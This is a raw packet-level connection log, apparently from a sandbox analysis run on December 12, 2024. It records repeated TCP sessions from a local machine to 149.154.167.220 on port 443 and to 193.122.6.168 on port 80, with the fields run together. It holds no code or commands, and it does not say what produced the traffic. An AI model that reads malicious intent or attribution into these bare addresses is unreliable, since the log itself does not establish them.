                                                                        Dec 12, 2024 21:40:10.088860035 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.088946104 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.088953972 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.089226007 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.089240074 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.089473009 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.089485884 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.090107918 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.090121984 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.090172052 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.090183973 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.090506077 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.090518951 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.090780973 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.090791941 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.090962887 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.090979099 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.091425896 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.091440916 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.091502905 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.091515064 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.091789961 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.091801882 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.092021942 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.092030048 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.092250109 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.092258930 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.092719078 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.092730999 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.092742920 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.092751980 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.092799902 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.092813015 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.093261957 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.093274117 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.093485117 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.093496084 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.093940973 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.093947887 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.093972921 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.093986034 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.094027042 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.094038963 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.094494104 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.094506979 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.094728947 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.094746113 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.095185995 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.095201969 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.095249891 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.095547915 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.095757008 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.095957994 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.096431971 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.139333963 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:10.151817083 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.151891947 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.151907921 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.151947975 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.151983023 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:10.199336052 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:11.803276062 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:11.803291082 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:11.803356886 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:11.803392887 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:11.803720951 CET44349921149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:11.803797960 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:11.803930998 CET49921443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:11.886394978 CET4992980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:12.006431103 CET8049929193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:12.006614923 CET4992980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:12.006800890 CET4992980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:12.126460075 CET8049929193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:13.283134937 CET8049929193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:13.290137053 CET4992980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:13.290877104 CET49934443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:13.290931940 CET44349934149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:13.291068077 CET49934443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:13.291431904 CET49934443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:13.291445971 CET44349934149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:13.410347939 CET8049929193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:13.410557032 CET4992980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:14.796154022 CET44349934149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:14.809047937 CET49934443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:14.809120893 CET44349934149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:14.809206009 CET49934443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:14.917305946 CET4993880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:15.037038088 CET8049938193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:15.037133932 CET4993880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:15.037293911 CET4993880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:15.157006025 CET8049938193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:16.324615955 CET8049938193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:16.334532976 CET4993880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:16.335453987 CET49942443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:16.335490942 CET44349942149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:16.335659027 CET49942443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:16.335994005 CET49942443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:16.336008072 CET44349942149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:16.454590082 CET8049938193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:16.455651045 CET4993880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:17.755461931 CET44349942149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:17.755548954 CET49942443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:17.757575989 CET49942443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:17.757590055 CET44349942149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:17.757993937 CET44349942149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:17.759778976 CET49942443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:17.759825945 CET44349942149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:17.759955883 CET49942443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:17.863651991 CET4994780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:17.984833002 CET8049947193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:17.986099005 CET4994780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:17.986148119 CET4994780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:18.106070042 CET8049947193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:19.254749060 CET8049947193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:19.263226986 CET4994780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:19.264255047 CET49949443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:19.264319897 CET44349949149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:19.265094995 CET49949443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:19.265465021 CET49949443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:19.265485048 CET44349949149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:19.386552095 CET8049947193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:19.389715910 CET4994780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:20.734888077 CET44349949149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:20.735338926 CET49949443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:20.736901999 CET49949443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:20.736911058 CET44349949149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:20.737152100 CET44349949149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:20.739340067 CET49949443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:20.739370108 CET44349949149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:20.739486933 CET44349949149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:20.739537954 CET49949443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:20.739561081 CET49949443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:20.845738888 CET4995480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:20.965833902 CET8049954193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:20.969639063 CET4995480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:20.969639063 CET4995480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:21.089560032 CET8049954193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:22.240010977 CET8049954193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:22.249356031 CET4995480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:22.249835014 CET49959443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:22.249878883 CET44349959149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:22.249947071 CET49959443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:22.250200033 CET49959443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:22.250235081 CET44349959149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:22.250284910 CET49959443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:22.356525898 CET4996180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:22.369421005 CET8049954193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:22.371014118 CET4995480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:22.476347923 CET8049961193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:22.478908062 CET4996180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:22.479038954 CET4996180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:22.598764896 CET8049961193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:23.781034946 CET8049961193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:23.788467884 CET49963443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:23.788505077 CET44349963149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:23.788671017 CET49963443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:23.789181948 CET49963443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:23.789195061 CET44349963149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:23.789223909 CET4996180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:23.909491062 CET8049961193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:23.909579039 CET4996180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:25.152940989 CET44349963149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:25.153072119 CET49963443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:25.155380964 CET49963443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:25.155390978 CET44349963149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:25.155777931 CET44349963149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:25.157840967 CET49963443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:25.157886982 CET44349963149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:25.157944918 CET49963443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:25.269426107 CET4996880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:25.389194012 CET8049968193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:25.389298916 CET4996880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:25.389414072 CET4996880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:25.509187937 CET8049968193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:26.670542002 CET8049968193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:26.677983999 CET4996880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:26.678100109 CET49974443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:26.678128004 CET44349974149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:26.678194046 CET49974443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:26.678626060 CET49974443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:26.678632975 CET44349974149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:26.798018932 CET8049968193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:26.798108101 CET4996880192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:28.041909933 CET44349974149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:28.041976929 CET49974443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:28.043843985 CET49974443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:28.043855906 CET44349974149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:28.044159889 CET44349974149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:28.046569109 CET49974443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:28.046611071 CET44349974149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:28.046684980 CET49974443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:28.181449890 CET4997680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:28.301202059 CET8049976193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:28.301292896 CET4997680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:28.301419973 CET4997680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:28.421143055 CET8049976193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:29.577446938 CET8049976193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:29.584944963 CET4997680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:29.585268021 CET49981443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:29.585340977 CET44349981149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:29.585411072 CET49981443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:29.585846901 CET49981443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:29.585872889 CET44349981149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:29.705255032 CET8049976193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:29.705327988 CET4997680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:30.956926107 CET44349981149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:30.957031965 CET49981443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:31.022336006 CET49981443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:31.022350073 CET44349981149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:31.022749901 CET44349981149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:31.079999924 CET49981443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:31.080132008 CET44349981149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:31.080236912 CET49981443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:31.232867956 CET4998780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:31.352641106 CET8049987193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:31.352735043 CET4998780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:31.353121042 CET4998780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:31.473526001 CET8049987193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:32.660923958 CET8049987193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:32.669429064 CET4998780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:32.669986010 CET49990443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:32.670027971 CET44349990149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:32.670265913 CET49990443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:32.670536041 CET49990443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:32.670552969 CET44349990149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:32.789448023 CET8049987193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:32.790234089 CET4998780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:34.096461058 CET44349990149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:34.096658945 CET49990443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:34.098408937 CET49990443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:34.098426104 CET44349990149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:34.099196911 CET44349990149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:34.101372957 CET49990443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:34.101454020 CET44349990149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:34.101588011 CET49990443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:34.268759012 CET4999580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:34.388510942 CET8049995193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:34.388603926 CET4999580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:34.388874054 CET4999580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:34.509782076 CET8049995193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:35.795852900 CET8049995193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:35.804116964 CET50000443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:35.804171085 CET44350000149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:35.804579020 CET50000443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:35.805109978 CET50000443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:35.805123091 CET44350000149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:35.908566952 CET4999580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:37.180320024 CET44350000149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:37.180418968 CET50000443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:37.181962967 CET50000443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:37.181972027 CET44350000149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:37.182210922 CET44350000149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:37.186512947 CET50000443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:37.186543941 CET44350000149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:37.186590910 CET50000443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:37.314047098 CET4999580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:37.315567970 CET5000480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:37.435410976 CET8050004193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:37.436986923 CET5000480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:37.437674046 CET5000480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:37.438971043 CET8049995193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:37.439141989 CET4999580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:37.557382107 CET8050004193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:38.777966976 CET8050004193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:38.786562920 CET50007443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:38.786602974 CET44350007149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:38.786797047 CET50007443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:38.787385941 CET50007443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:38.787405014 CET44350007149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:39.017977953 CET5000480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:40.162399054 CET44350007149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:40.162513971 CET50007443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:40.164104939 CET50007443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:40.164114952 CET44350007149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:40.164351940 CET44350007149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:40.165961981 CET50007443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:40.166003942 CET44350007149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:40.166122913 CET44350007149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:40.166160107 CET50007443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:40.166160107 CET50007443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:40.304260015 CET5001180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:40.425055027 CET8050011193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:40.425189972 CET5001180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:40.425350904 CET5001180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:40.545077085 CET8050011193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:41.715639114 CET8050011193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:41.723483086 CET5000480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:41.723685026 CET5001180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:41.723870993 CET50016443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:41.723911047 CET44350016149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:41.724046946 CET50016443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:41.724371910 CET50016443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:41.724381924 CET44350016149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:41.846852064 CET8050011193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:41.847001076 CET5001180192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:43.104933977 CET44350016149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:43.105017900 CET50016443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:43.107059956 CET50016443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:43.107070923 CET44350016149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:43.107330084 CET44350016149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:43.109288931 CET50016443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:43.109317064 CET44350016149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:43.109448910 CET44350016149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:43.109518051 CET50016443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:43.109549999 CET50016443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:43.221811056 CET5002080192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:43.342900038 CET8050020193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:43.343009949 CET5002080192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:43.343158960 CET5002080192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:43.462856054 CET8050020193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:44.619431019 CET8050020193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:44.628597021 CET5002080192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:44.629075050 CET50024443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:44.629120111 CET44350024149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:44.629188061 CET50024443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:44.629708052 CET50024443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:44.629724026 CET44350024149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:44.750876904 CET8050020193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:44.754942894 CET5002080192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:46.026751995 CET44350024149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:46.026823997 CET50024443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:46.028585911 CET50024443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:46.028593063 CET44350024149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:46.028832912 CET44350024149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:46.030468941 CET50024443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:46.030493021 CET44350024149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:46.030615091 CET44350024149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:40:46.030664921 CET50024443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:46.030682087 CET50024443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:40:46.204998970 CET5002980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:46.324776888 CET8050029193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:40:46.324867010 CET5002980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:40:46.325174093 CET5002980192.168.2.5193.122.6.168
